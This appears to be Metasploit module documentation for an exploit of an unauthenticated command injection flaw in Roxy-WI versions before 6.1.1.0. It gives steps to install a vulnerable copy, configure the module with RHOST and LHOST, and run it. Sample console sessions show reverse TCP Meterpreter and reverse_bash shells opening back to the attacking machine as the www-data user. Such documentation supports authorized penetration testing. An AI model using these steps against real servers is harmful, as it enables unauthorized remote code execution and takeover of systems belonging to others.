## Vulnerable Application

### Description

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution in the context of the web server user.

### Setup

Roxy-WI requires Python and a web server to run. See the following URL for the required Python version and other packages:

https://roxy-wi.org/installation.py#manual

```
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
cd /var/www    # the remaining paths are relative to the web root
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py    # create the application database
chown -R www-data:www-data haproxy-wi    # hand ownership to the web server user
```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/roxy_wi_exec`
4. Set `RHOST` to the address of the target Roxy-WI machine.
5. Set `LHOST` to the address of your attacking machine.
6. Run `exploit`
7. Do: `run`
8. You should get a shell as the user running the Roxy-WI server.

## Options

Set `TARGETURI` if Roxy-WI is installed at a custom path.

### TARGETURI

The base path to Roxy-WI. The default value is `/`

## Scenarios

```
msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Sending stage (40164 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300
[+] Exploit successfully executed.

meterpreter > pwd
/var/www/haproxy-wi/app
```

You can also use cmd payloads.

```
msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```